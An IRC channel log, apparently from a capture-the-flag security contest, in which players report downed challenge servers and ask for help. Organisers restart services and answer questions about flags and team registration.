  2873. (08:18:52) (auscompgeek) how does one submit multiple solutions to a challenge O_o
  2874. (08:18:56) ••• jOin: (thx1143) ([email protected])
  2875. (08:19:50) (+frozencemetery) there is a submit field
  2876. (08:19:57) (+frozencemetery) to the right of the gameboard
  2877. (08:20:50) (foundation) frozencemetery: you can shut down ezhp again as far as i'm concerned :)
  2878. (08:21:11) (+frozencemetery) lol
  2879. (08:21:47) (upb) auscompgeek: probably using a webscale db :)
  2880. (08:23:02) ••• jOin: (N3tAuG3r) ([email protected])
  2881. (08:23:13) (+mserrano) auscompgeek: I'm... really not sure
  2882. (08:23:37) (+mserrano) I didn't write the site, so...
  2883. (08:23:50) ••• jOin: (bloup_) (95acea33@gateway/web/freenode/ip.149.172.234.51)
  2884. (08:23:51) (+mserrano) it does seem to be misbehaving
  2885. (08:23:58) (+mserrano) when the right people are awake again they will get on it
  2886. (08:24:23) ••• jOin: (Neuroticar) (~neurotica@unaffiliated/neuroticar)
  2887. (08:24:44) (Neuroticar) why is misc 10 down?
  2888. (08:25:27) (n00bz) who i can pm about web150?
  2889. (08:25:54) (+mserrano) n00bz: if you mean mtpox, me
  2890. (08:26:08) ••• jOin: (Cimmi) ([email protected])
  2891. (08:26:23) (+mserrano) Neuroticar: if you mean heartbleed, you should try multiple ports
  2892. (08:26:34) ••• jOin: ([CISSP]HoLyVieR) ([email protected])
  2893. (08:26:43) (+frozencemetery) it's postgres iirc
  2894. (08:26:56) (+frozencemetery) oh good I don't have to answer questions about mtpox anymore :D
  2895. (08:27:05) (mttpgrm) isn't heartbleed still down?
  2896. (08:27:54) (foundation) mserrano: what different ports, can you update the message?
  2897. (08:28:07) (plaintext) reekee, reekee, it rhymes with leeakee
  2898. (08:28:22) (pcc7) anyone working on pyjail?
  2899. (08:28:30) (+mserrano) foundation: 10000-11000 are in the message, aren't they?
  2900. (08:28:32) • +mserrano checks
  2901. (08:28:35) ••• qUit: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197) Ping timeout: 240 seconds
  2902. (08:28:36) (+mserrano) (I did update it a while ago)
  2903. (08:29:20) (mttpgrm) first line of the message still reads "STILL DOWN SORRY" for me
  2904. (08:29:29) (Neuroticar) me too
  2905. (08:29:29) (foundation) yep
  2906. (08:29:31) (+clockish) that's because it's still down
  2907. (08:29:34) (nullProtectorate) same for me
  2908. (08:29:35) (mttpgrm) i figured that
  2909. (08:29:54) ••• jOin: (pez) ([email protected])
  2910. (08:29:54) (+clockish) but, it will be up in like 10 min, for real, hopefully, this time
  2911. (08:29:55) (+mserrano) oh bleh it was changed while i was asleep
  2912. (08:30:07) (+frozencemetery) mserrano: the world is constantly changing!
  2913. (08:30:16) ••• jOin: ([pwn]poizan42) ([email protected])
  2914. (08:30:24) (+clockish) mserrano: and you should change your location to the CIC
  2915. (08:30:30) (foundation) oh, ok
  2916. (08:30:32) (+mserrano) yes yes
  2917. (08:30:36) (+mserrano) I should shower first
  2918. (08:30:46) ••• jOin: (sameer) (47b3654a@gateway/web/freenode/ip.71.179.101.74)
  2919. (08:30:51) (sameer) hello
  2920. (08:30:53) (+frozencemetery) atomicly!
  2921. (08:30:59) (+clockish) hi!
  2922. (08:31:00) (sameer) i am trying to do the heartbleed
  2923. (08:31:01) (sameer) https://54.82.147.138:45373
  2924. (08:31:03) (+clockish) it's down
  2925. (08:31:07) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2926. (08:31:07) (sameer) the server is not working
  2927. (08:31:11) (+frozencemetery) it even says in the description that it is down
  2928. (08:31:14) (sameer) really
  2929. (08:31:15) (+clockish) like it says in the description ;)
  2930. (08:31:39) ••• jOin: (f00b4r_) ([email protected])
  2931. (08:31:42) (+clockish) it may be up very soon though.
  2932. (08:31:59) (sameer) ok
  2933. (08:32:06) ••• jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
  2934. (08:33:25) ••• qUit: (naavin_away) (~naavinm@unaffiliated/naavinm) Remote host closed the connection
  2935. (08:33:58) ••• qUit: (_simo) ([email protected]) Ping timeout: 245 seconds
  2936. (08:34:56) ••• qUit: (sameer) (47b3654a@gateway/web/freenode/ip.71.179.101.74) Client Quit
  2937. (08:35:26) ••• jOin: (krycek) ([email protected])
  2938. (08:35:36) (f0rki) na
  2939. (08:36:01) ••• jOin: (def) (2a705e33@gateway/web/freenode/ip.42.112.94.51)
  2940. (08:36:10) (def) who can help me web 150
  2941. (08:36:18) (+frozencemetery) pm
  2942. (08:36:21) (+frozencemetery) def: ^
  2943. (08:36:47) (mischa__) you should reduce cash prizes and invest more money in stable servers
  2944. (08:37:01) ••• jOin: (chris____) ([email protected])
  2945. (08:37:25) (Neuroticar) mischa__, +1
  2946. (08:37:32) ••• jOin: (zoff_ita) ([email protected])
  2947. (08:38:05) (+mserrano) if throwing more money at the server would fix it believe me we would have done it
  2948. (08:38:05) ••• jOin: (pnX) (~pnx@unaffiliated/pnx)
  2949. (08:38:40) ••• jOin: (elanthia) ([email protected])
  2950. (08:39:34) ••• jOin: (jarCrack) ([email protected])
  2951. (08:39:38) ••• jOin: (LouTerrailloune) ([email protected])
  2952. (08:42:40) (iZsh) or ppl could invest in a brain instead of running dirbuster :)
  2953. (08:43:08) (+frozencemetery) darbastar
  2954. (08:43:33) (WhizzMan) derpbester
  2955. (08:43:35) ••• qUit: (Redford) ([email protected]) Read error: Connection reset by peer
  2956. (08:45:16) ••• jOin: (hanja617) ([email protected])
  2957. (08:45:34) ••• qUit: (hanja617) ([email protected]) Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )
  2958. (08:45:45) ••• jOin: (Redford) ([email protected])
  2959. (08:45:53) ••• jOin: (naam) ([email protected])
  2960. (08:46:53) ••• pArt: (h0wl) ([email protected])
  2961. (08:47:20) ••• jOin: (Yerer) ([email protected])
  2962. (08:47:52) ••• jOin: (_simo) ([email protected])
  2963. (08:48:24) ••• qUit: (nofiki) ([email protected]) Quit: Leaving.
  2964. (08:48:25) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2965. (08:49:17) ••• jOin: (fritz[]) ([email protected])
  2966. (08:51:10) ••• qUit: (atem) ([email protected]) Ping timeout: 255 seconds
  2967. (08:51:45) ••• qUit: (j0f) (~amirreza@unaffiliated/j0f) Read error: Connection reset by peer
  2968. (08:51:50) ••• jOin: (atem) ([email protected])
  2969. (08:51:54) (+mserrano) important note for people:
  2970. (08:52:15) ••• jOin: (j0f) ([email protected])
  2971. (08:52:15) ••• qUit: (j0f) ([email protected]) Changing host
  2972. (08:52:15) ••• jOin: (j0f) (~amirreza@unaffiliated/j0f)
  2973. (08:52:53) ••• jOin: (muchacho) ([email protected])
  2974. (08:52:55) (Gynvael) <silence>
  2975. (08:52:56) ••• jOin: (ejo) ([email protected])
  2976. (08:53:02) ••• qUit: (braoru) ([email protected]) Quit: braoru
  2977. (08:53:38) (+mserrano) Kappa's binary has been updated to match the version on the server. My bad, I thought we had updated both and we didn't.
  2978. (08:53:51) ••• jOin: (jazz) ([email protected])
  2979. (08:53:53) (+mserrano) The bug should hopefully be the same.
  2980. (08:54:05) ••• jOin: (nvmr) (5164f498@gateway/web/freenode/ip.81.100.244.152)
  2981. (08:54:13) ••• qUit: (eastwolf2) ([email protected]) Ping timeout: 252 seconds
  2982. (08:54:16) (pcc7) any help for pyjail?
  2983. (08:54:17) (nvmr) is heartbleed website down?
  2984. (08:54:32) (+mserrano) Gynvael: was just making sure my change actually went through
  2985. (08:55:20) ••• qUit: (jaken) ([email protected]) Ping timeout: 276 seconds
  2986. (08:55:38) ••• qUit: (FattyMcFatterson) ([email protected]) Ping timeout: 245 seconds
  2987. (08:56:04) (+mserrano) (thanks to beollejavi for pointing it out)
  2988. (08:56:39) (fritz[]) yeah heartbleed seems down again :(
  2989. (08:57:47) (nvmr) thx fritz
  2990. (08:58:51) ••• jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:7113:3ac:9f72:3881)
  2991. (08:59:51) (+clockish) heartbleed should be back up now
  2992. (09:00:05) ••• qUit: (def) (2a705e33@gateway/web/freenode/ip.42.112.94.51) Ping timeout: 240 seconds
  2993. (09:00:14) (+clockish) nvmr fritz[] anyone ^
  2994. (09:00:24) (fritz[]) yeah, confirmed
  2995. (09:00:25) (fritz[]) thx
  2996. (09:00:26) ••• jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
  2997. (09:00:33) (nagi_) hi
  2998. (09:00:37) (+clockish) hello!
  2999. (09:02:58) ••• qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Read error: Connection reset by peer
  3000. (09:03:02) (nvmr) is back up, yes
  3001. (09:04:24) ••• qUit: (jazz) ([email protected]) Quit: leaving
  3002. (09:05:09) ••• jOin: (Stean) ([email protected])
  3003. (09:05:25) ••• jOin: (naam) ([email protected])
  3004. (09:06:57) ••• qUit: (j0f) (~amirreza@unaffiliated/j0f) Quit: Quit
  3005. (09:08:08) ••• qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Ping timeout: 245 seconds
  3006. (09:08:19) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3007. (09:08:37) ••• jOin: (Ph4te) ([email protected])
  3008. (09:08:58) (n00bz) any help on web150?
  3009. (09:09:45) (mongo12) I just noticed you can click something on the board to see more challenges :/
  3010. (09:09:52) ([CISSP]HoLyVieR) someone might need to restart kpop apache instance
  3011. (09:09:53) (mongo12) but since site is so laggy, not sure what I clicked
  3012. (09:11:41) ([CISSP]HoLyVieR) I might have just found a bug which reliably crash apache server
  3013. (09:12:05) ••• qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Ping timeout: 240 seconds
  3014. (09:12:05) ••• qUit: (f___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130) Ping timeout: 240 seconds
  3015. (09:12:11) (+tylerni7) ugh
  3016. (09:12:12) (+tylerni7) alright
  3017. (09:12:13) ••• jOin: (DeadheadTn) ([email protected])
  3018. (09:12:14) (+tylerni7) I just woke up
  3019. (09:12:23) (+tylerni7) morning everyone
  3020. (09:12:53) ••• qUit: ([1]Knight) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
  3021. (09:12:58) (k00mi) mongo12: centerof that circle thingy
  3022. (09:15:42) ••• jOin: (sdfsfdsfd) ([email protected])
  3023. (09:15:58) (corpille) nice heartbleed !
  3024. (09:16:28) (+clockish) yeah it's back
  3025. (09:17:38) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Quit: Leaving
  3026. (09:18:06) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3027. (09:18:11) ••• jOin: (nofiki) ([email protected])
  3028. (09:20:14) ••• qUit: (Yerer) ([email protected]) Ping timeout: 252 seconds
  3029. (09:21:30) ••• jOin: (sweet_potatoes) ([email protected])
  3030. (09:21:50) ••• qUit: (nofiki) ([email protected]) Client Quit
  3031. (09:22:03) ••• jOin: (the_doctor) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  3032. (09:22:23) (the_doctor) I tried sending an email to [email protected], but that address doesn't seem to exist.
  3033. (09:22:23) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  3034. (09:22:27) ••• nIck: (the_doctor) is now known as (Guest76035)
  3035. (09:23:05) (+tylerni7) Guest76035: not sure where you saw that email
  3036. (09:23:11) (+tylerni7) [email protected]
  3037. (09:23:16) (+tylerni7) or [email protected]
  3038. (09:23:21) (Guest76035) It's on your rules page.
  3039. (09:23:24) (+tylerni7) lol
  3040. (09:24:11) (j0f) g++ file is 404 ?
  3041. (09:24:17) (MavJS) lulz, indeed
  3042. (09:24:47) (j0f) nvm, got it
  3043. (09:25:01) (Guest76035) Thanks for the correct email address.
  3044. (09:25:07) (+frozencemetery) g++ file should be okay, let me know if there's a problem with it
  3045. (09:25:50) ••• nIck: (vladum|away) is now known as (vladum_)
  3046. (09:26:54) ••• nIck: (sweet_potatoes) is now known as (_ML)
  3047. (09:27:03) ••• jOin: (adniral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
  3048. (09:27:42) (slinkyman) g++ is 404ing for me too
  3049. (09:28:09) (slinkyman) working now
  3050. (09:28:27) ••• jOin: (virodoran) (uid2011@gateway/web/irccloud.com/x-nkhkmgpqfkcsbbie)
  3051. (09:28:35) ••• qUit: (plo) ([email protected]) Ping timeout: 240 seconds
  3052. (09:29:28) ••• jOin: (glzd) (7505d457@gateway/web/freenode/ip.117.5.212.87)
  3053. (09:30:20) ••• qUit: (Mshing0) ([email protected]) Remote host closed the connection
  3054. (09:31:21) (nvmr) rendezvous onion site down?
  3055. (09:31:35) ••• jOin: (plo) ([email protected])
  3056. (09:31:59) (+frozencemetery) nvmr: it is working
  3057. (09:32:32) (nvmr) ok, ty
  3058. (09:32:38) (nvmr) must be something my end
  3059. (09:34:41) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
  3060. (09:34:52) (plaintext) reekee is so slow :(
  3061. (09:34:52) (+tylerni7) keep in mind it isn't just a tor hidden service, it's more complex than that
  3062. (09:35:29) (adniral0) plaintext: I feel this pain too
  3063. (09:35:46) (sven) is the heartbleed back up btw? :D
  3064. (09:35:48) ••• nIck: (adniral0) is now known as (admiral0)
  3065. (09:35:48) (mak`) tylerni7: you dont say?
  3066. (09:36:00) (Hertz_) =))
  3067. (09:36:08) (+tylerni7) plaintext: I see no load on it, and it loaded fast for me?
  3068. (09:36:12) (+tylerni7) what issue are you having?
  3069. (09:36:16) (sven) ah, nvm
  3070. (09:37:48) ••• jOin: (lkwpeter) ([email protected])
  3071. (09:37:54) ••• jOin: (Yerer) ([email protected])
  3072. (09:38:06) ••• qUit: (Stean) ([email protected]) Read error: Connection reset by peer
  3073. (09:38:52) (plaintext) tylerni7: oh, we solved it now :)
  3074. (09:38:55) ••• jOin: (Stean) ([email protected])
  3075. (09:38:58) (+tylerni7) ok
  3076. (09:39:04) (plaintext) tylerni7: it was slow though, for a long time
  3077. (09:39:04) (+tylerni7) :)
  3078. (09:39:08) (+tylerni7) weird
  3079. (09:39:09) (plaintext) tylerni7: sometimes it would answer quickly
  3080. (09:39:11) (+tylerni7) could be dirbuster
  3081. (09:39:11) ••• jOin: (tarkiz) (~tarkiz@2001:470:e328:b000:304e:abd6:bc0d:de67)
  3082. (09:39:23) ••• jOin: (naam) ([email protected])
  3083. (09:39:24) (+tylerni7) people sending 1k conns/second or whatever make our servers sad
  3084. (09:39:28) (plaintext) why would anyone dirbust when you have the source
  3085. (09:39:30) (plaintext) makes me want to cry
  3086. (09:39:37) (kushou) yeah, 502 right now :(
  3087. (09:39:38) (+tylerni7) plaintext: I know.. and yet...
  3088. (09:39:50) (+tylerni7) kushou: it happens occasionally, and the web guys aren't here
  3089. (09:39:58) (+tylerni7) kushou: just refresh and it should work /most of the time/
  3090. (09:40:02) (kushou) yeah
  3091. (09:40:07) (kushou) it's almost back, thanks
  3092. (09:40:11) (+tylerni7) I know it's frustrating :/ sorry
  3093. (09:40:29) (kushou) needs JS, it's my fault this time :P
  3094. (09:40:38) (+tylerni7) :P
  3095. (09:40:43) (corpille) main site still giving a lot of 502 :/
  3096. (09:40:57) ••• jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
  3097. (09:41:02) (B1N4RY) 502 502 502 502!!!!!
  3098. (09:41:03) (+tylerni7) corpille: refresh, the majority of the time it should work... I don't know
  3099. (09:41:20) (B1N4RY) tylerni7: doesn't work..
  3100. (09:41:20) (+tylerni7) hmm
  3101. (09:41:23) (+tylerni7) it seems sad
  3102. (09:41:25) (+tylerni7) looking into it
  3103. (09:41:26) (+tylerni7) sorry
  3104. (09:41:35) ••• qUit: (glzd) (7505d457@gateway/web/freenode/ip.117.5.212.87) Ping timeout: 240 seconds
  3105. (09:41:53) ••• qUit: (CaIlou) ([email protected]) Ping timeout: 245 seconds
  3106. (09:42:06) (corpille) yeah it works sometimes to show the website but when you want to load the challenge it fails
  3107. (09:42:44) (+tylerni7) seems back now... maybe...
  3108. (09:42:45) (+tylerni7) ugh
  3109. (09:42:47) ••• qUit: (Yerer) ([email protected]) Ping timeout: 276 seconds
  3110. (09:42:50) • +mserrano hates computers
  3111. (09:42:57) (+tylerni7) the people who wrote the infrastructure are asleep
  3112. (09:43:48) (jagger_) you mean they ar enot on-call? :)
  3113. (09:43:51) (jagger_) with pagers
  3114. (09:43:57) (+tylerni7) jagger_: eh we can phone them
  3115. (09:43:58) (+tylerni7) but :P
  3116. (09:44:04) (jagger_) just kidding
  3117. (09:44:15) (B1N4RY) Can someone help me with heartbleed with pm?
  3118. (09:44:22) (+tylerni7) B1N4RY: pm clockish
  3119. (09:45:13) ••• jOin: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  3120. (09:45:16) ••• jOin: (ramsexy) ([email protected])
  3121. (09:45:25) ••• pArt: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  3122. (09:45:55) (admiral0) tylerni7: reekee keeps killing users I create
  3123. (09:46:06) ••• jOin: (CaIlou) ([email protected])
  3124. (09:46:09) (+tylerni7) admiral0: "killing"
  3125. (09:46:12) (+tylerni7) can you be more precise?
  3126. (09:46:46) (admiral0) user is either None but it won't register
  3127. (09:46:51) (admiral0) or it's not active
  3128. (09:46:54) (f0rki) same here are you guys resetting the db periodically?
  3129. (09:47:06) (+tylerni7) f0rki: yes
  3130. (09:47:10) (f0rki) ah ok
  3131. (09:47:44) (admiral0) tylerni7: the only explanation is that it's not active any more
  3132. (09:48:03) (f0rki) so no flags in the db ^^
  3133. (09:48:25) (admiral0) is there a regexp for a flag?
  3134. (09:48:30) (+tylerni7) admiral0: the db refreshed periodically
  3135. (09:48:35) (+tylerni7) so maybe tht's what you're seeing
  3136. (09:48:44) (admiral0) i can't register any more that user
  3137. (09:48:52) ••• jOin: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  3138. (09:49:06) (+tylerni7) admiral0: pm me maybe
  3139. (09:49:13) (+tylerni7) this sounds like it's working fine
  3140. (09:49:14) (supersat) heh... the pctf interface reminds me that the MS Surface ships with the Program Manager group migration tool... just in case you're upgrading your ARM tablet from Windows 3.1 :P
  3141. (09:49:26) ••• pArt: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  3142. (09:50:58) ••• qUit: (thx1143) ([email protected]) Quit: This computer has gone to sleep
  3143. (09:52:24) ••• jOin: (corewar) ([email protected])
  3144. (09:53:36) ••• jOin: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162)
  3145. (09:53:37) ••• qUit: (tarkiz) (~tarkiz@2001:470:e328:b000:304e:abd6:bc0d:de67) Ping timeout: 252 seconds
  3146. (09:53:42) (hellman) open new challs!
  3147. (09:54:38) (+tylerni7) hellman: maybe in a bit
  3148. (09:54:48) (+tylerni7) you should get rsa in the mean time :)
  3149. (09:55:46) ••• jOin: (thx1143) ([email protected])
  3150. (09:56:15) (acez) I never liked pokemon
  3151. (09:56:16) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  3152. (09:56:17) ••• jOin: (tarkiz) ([email protected])
  3153. (09:56:37) (chuckleberry) heart bleed working fine
  3154. (09:56:41) (chuckleberry) gg guys
  3155. (09:57:03) (xp45g) anybody i can pm for reekee?
  3156. (09:57:09) (+tylerni7) xp45g: me
  3157. (09:57:53) (iZsh) no need to open new challs, we'll open them ;-)
  3158. (09:58:42) (+mserrano) if we stay stuck here a bit longer we might manually open one
  3159. (09:58:43) (+mserrano) but not yet
  3160. (09:59:10) (kanghee) reekee 500 :(
  3161. (09:59:12) (ShortKidd) that was a longer than 4 hour sleep...
  3162. (10:00:11) (ryan-c) tylerni7: pm'd you a question about rsa
  3163. (10:00:18) ••• jOin: (rvpersie) ([email protected])
  3164. (10:00:28) ••• jOin: (asdfafs) (afc14aa8@gateway/web/freenode/ip.175.193.74.168)
  3165. (10:01:34) (f0rki) reekee seems to be down
  3166. (10:01:42) ••• jOin: (eastwolf_) ([email protected])
  3167. (10:02:02) (+tylerni7) f0rki: hm will look at it
  3168. (10:02:03) (eastwolf_) do you want the hex for the heartbleed flag? we're typing it in a bunch of different ways and having trouble ><
  3169. (10:02:16) ••• jOin: (def) (2a709cb3@gateway/web/freenode/ip.42.112.156.179)
  3170. (10:02:36) (Guest76035) @eastwolf - include the "flag" part
  3171. (10:02:46) (+tylerni7) eastwolf_: it's all printable... why would you give hex -_-
  3172. (10:02:57) ••• jOin: (quangntenemy) ([email protected])
  3173. (10:03:20) (shabgard) flag{somwthing}
  3174. (10:03:23) (quangntenemy) is reekee down? all i see is blank
  3175. (10:03:25) (+tylerni7) f0rki: try now
  3176. (10:03:35) (eastwolf_) OH! thanks guest :)
  3177. (10:03:36) (+tylerni7) quangntenemy: I just refreshed stuff
  3178. (10:04:04) (stypr) sup quangntenemy
  3179. (10:04:05) (criple_ripper) tylerni7 still down i think :(
  3180. (10:04:18) (kanghee) yep still returns 500
  3181. (10:04:18) (f0rki) yep still down
  3182. (10:04:21) ••• jOin: (ByteMyEth0) (18fe8dec@gateway/web/freenode/ip.24.254.141.236)
  3183. (10:04:23) ••• jOin: (paul_55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
  3184. (10:04:26) (stypr) django
  3185. (10:04:27) (+tylerni7) ouch, was up for a second but died
  3186. (10:04:29) (stypr) DJ ango
  3187. (10:04:29) (_ML) web300 down now
  3188. (10:04:40) (_ML) tylerni7: web300 down now :(
  3189. (10:04:42) (quangntenemy) :(
  3190. (10:05:07) (stypr) quangntenemy: it's ok
  3191. (10:05:11) (stypr) let's do kpop
  3192. (10:05:14) (stypr) or something else
  3193. (10:05:14) ••• qUit: (lmxs) ([email protected]) Quit: Leaving...
  3194. (10:05:18) (quangntenemy) i need to rest my eyes lol
  3195. (10:05:26) ••• jOin: (tonic1) ([email protected])
  3196. (10:05:28) (stypr) it's night here too
  3197. (10:05:28) (f0rki) disabling javascript helps a lot ^^
  3198. (10:05:32) (+mserrano) bubble bubble pop pop
  3199. (10:05:55) (+tylerni7) try reekee again
  3200. (10:06:01) (+tylerni7) added a timeout to kill gunicorn things
  3201. (10:06:07) (+tylerni7) something is making it sad, not quite sure what
  3202. (10:06:08) (admiral0) ty
  3203. (10:06:17) (+tylerni7) ugh
  3204. (10:06:19) (+tylerni7) still seems slow/hanging
  3205. (10:06:24) ••• jOin: (johnCool) ([email protected])
  3206. (10:06:27) (criple_ripper) perhaps because it's still dead :P
  3207. (10:06:29) (f0rki) yeah
  3208. (10:06:37) (ByteMyEth0) hey tyler could I steal you for a sec?
  3209. (10:06:43) (stypr) nope
  3210. (10:06:43) (+tylerni7) h/o lemme fix reekee
  3211. (10:06:48) (_ML) tylerni7:
  3212. (10:06:53) (_ML) seems mysql of web300 was down
  3213. (10:07:11) ••• qUit: (pez) ([email protected]) Ping timeout: 252 seconds
  3214. (10:07:11) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  3215. (10:07:29) (ryan-c) tylerni7: can you please take a look at my pm?
  3216. (10:07:38) ••• jOin: (naam) ([email protected])
  3217. (10:07:53) ••• jOin: (irctc366) (62a90e81@gateway/web/freenode/ip.98.169.14.129)
  3218. (10:08:56) ••• qUit: (CaIlou) ([email protected]) Ping timeout: 258 seconds
  3219. (10:09:02) ••• qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Quit: Page closed
  3220. (10:09:57) (+mserrano) whatscat hopefully back to reasonable
  3221. (10:10:03) • +mserrano restarted/reset mysql
  3222. (10:10:35) (+tylerni7) can people look at reekee, just restarted, this time I'm logging to see..
  3223. (10:10:49) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  3224. (10:10:50) (+tylerni7) seems to be working though
  3225. (10:11:24) (quangntenemy) tylerni7: i'm still getting blank pages
  3226. (10:11:28) (+tylerni7) .aaand not it seems dead ok
  3227. (10:11:29) (+tylerni7) imma reboot
  3228. (10:11:31) • +tylerni7 shrugs
  3229. (10:11:53) (bobsteam) itwasntme
  3230. (10:12:02) (admiral0) me neither *shrug*
  3231. (10:12:05) ••• qUit: (irctc366) (62a90e81@gateway/web/freenode/ip.98.169.14.129) Ping timeout: 240 seconds
  3232. (10:12:46) (j0f) you had to make it that hard? xD
  3233. (10:12:46) (criple_ripper) tylerni7 take the server out of the room and bring it back in..
  3234. (10:12:50) (criple_ripper) that should do it
  3235. (10:13:18) (+mserrano) j0f: ?
  3236. (10:13:29) (+mserrano) j0f: make what that hard?
  3237. (10:13:47) (+frozencemetery) http://xkcd.com/908/
  3238. (10:13:47) (j0f) mserrano, the whole ctf is tough & hard
  3239. (10:14:17) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  3240. (10:14:21) (bobsteam) tough and hard is good :D
  3241. (10:14:23) ••• jOin: (albntomat0) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  3242. (10:14:25) (Zoro) gay
  3243. (10:14:26) (bobsteam) twss
  3244. (10:14:34) (j0f) lol
  3245. (10:14:43) (kanghee) hmm, is reekee server still rebooting?
  3246. (10:14:46) ••• jOin: (naam) ([email protected])
  3247. (10:14:49) ••• jOin: ([ToH]rbino) ([email protected])
  3248. (10:15:07) (bobsteam) kanghee: doesn't seem up be up, so... hopefully?
  3249. (10:15:15) (+frozencemetery) kanghee: probably, aws is really slow at reboots. Give it a couple more minutes.
  3250. (10:15:26) (kanghee) k np
  3251. (10:16:22) ••• jOin: (player10) ([email protected])
  3252. (10:16:39) ••• jOin: (pez) ([email protected])
  3253. (10:17:02) ••• qUit: (nullProtectorate) ([email protected]) Remote host closed the connection
  3254. (10:17:22) (bobsteam) reekee up
  3255. (10:17:28) (admiral0) yeeee
  3256. (10:18:18) (mongo12) but sooo slow :/ or is it just me?
  3257. (10:18:31) ••• qUit: (nvmr) (5164f498@gateway/web/freenode/ip.81.100.244.152) Quit: Page closed
  3258. (10:18:34) (bobsteam) isslow =)
  3259. (10:18:36) (player10) not just you
  3260. (10:18:45) (+tylerni7) hmmm
  3261. (10:19:21) ••• qUit: (cybercybercyber) ([email protected]) Quit: cybercybercyber
  3262. (10:19:36) ••• qUit: (thx1143) ([email protected]) Quit: This computer has gone to sleep
  3263. (10:19:51) ••• jOin: (MaaaZ) ([email protected])
  3264. (10:19:59) (player10) Failed to connect to 54.82.251.203:8000
  3265. (10:20:01) (player10) :(
  3266. (10:20:05) ••• jOin: (Butters_Idle) ([email protected])
  3267. (10:20:12) (mongo12) yeah its dead now :/
  3268. (10:20:15) (javex) sorry
  3269. (10:20:20) ••• qUit: (n00bz) ([email protected]) Remote host closed the connection
  3270. (10:20:35) ••• qUit: (thisnicknameisav) (7b748d38@gateway/web/freenode/ip.123.116.141.56) Ping timeout: 240 seconds
  3271. (10:20:43) (+tylerni7) more workers now, let's see what happens
  3272. (10:20:47) (+tylerni7) probably will just die faster
  3273. (10:20:48) (+tylerni7) :P
  3274. (10:20:50) (jarCrack) hi can i join an existing team?
  3275. (10:20:56) (jarCrack) hi=how
  3276. (10:21:05) ••• jOin: (subsnake) ([email protected])
  3277. (10:21:08) (ShortKidd) yeah
  3278. (10:21:26) (ShortKidd) If you find someone who will let you join their team
  3279. (10:21:38) (kanghee) reekee is way faster :)
  3280. (10:21:45) (ejo) damn kukuna sucks!
  3281. (10:21:55) (ejo) his health is so weak, and his attacks omg
  3282. (10:22:01) (jarCrack) lol i got one
  3283. (10:22:04) ••• jOin: (bool_101) ([email protected])
  3284. (10:22:19) (jarCrack) but dont knoow how create an account without creating a new team
  3285. (10:22:38) ••• jOin: (toto) ([email protected])
  3286. (10:22:38) (+tylerni7) reekee seems happier for now with more workers....
  3287. (10:22:48) (mongo12) much better now tylerni7
  3288. (10:22:49) (mongo12) thanks
  3289. (10:22:57) ••• qUit: (Onemore) ([email protected]) Quit: Onemore
  3290. (10:22:59) ••• qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 240 seconds
  3291. (10:23:01) ••• nIck: (toto) is now known as (Guest89597)
  3292. (10:24:48) ••• jOin: (trelgak) ([email protected])
  3293. (10:24:53) ••• jOin: (tedmeyer) ([email protected])
  3294. (10:26:45) ••• jOin: (Barbara_Tracy) ([email protected])
  3295. (10:27:34) ••• jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
  3296. (10:27:59) ••• qUit: (poppopret) ([email protected]) Remote host closed the connection
  3297. (10:28:38) ••• qUit: (def) (2a709cb3@gateway/web/freenode/ip.42.112.156.179) Quit: Page closed
  3298. (10:29:26) ••• jOin: (approximatehack) (7ab33139@gateway/web/freenode/ip.122.179.49.57)
  3299. (10:29:36) (sdfsfdsfd) hello world
  3300. (10:30:19) (+dickoff) if anyone's working on kappa I'd like to hear your current status
  3301. (10:30:24) (Zoro) 0_0
  3302. (10:30:24) ••• qUit: (ejo) ([email protected]) Ping timeout: 258 seconds
  3303. (10:30:40) (ShortKidd) I got to the "Darude - Sandstorm" part
  3304. (10:31:28) ••• qUit: (fritz[]) ([email protected]) Ping timeout: 245 seconds
  3305. (10:31:28) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  3306. (10:32:49) (pcc7) anyone working on PyJail?
  3307. (10:32:52) (Zoro) *** HEAP FUCKERY DETECTED ***
  3308. (10:33:48) (Barbara_Tracy) I have a question on web300?
  3309. (10:33:54) (Barbara_Tracy) crew, pls pm me
  3310. (10:34:10) (iZsh) dickoff: i think we're almost done we it
  3311. (10:34:13) (iZsh) with
  3312. (10:35:08) (Zoro) Which one is Kappa?
  3313. (10:35:25) (sven) pokemon
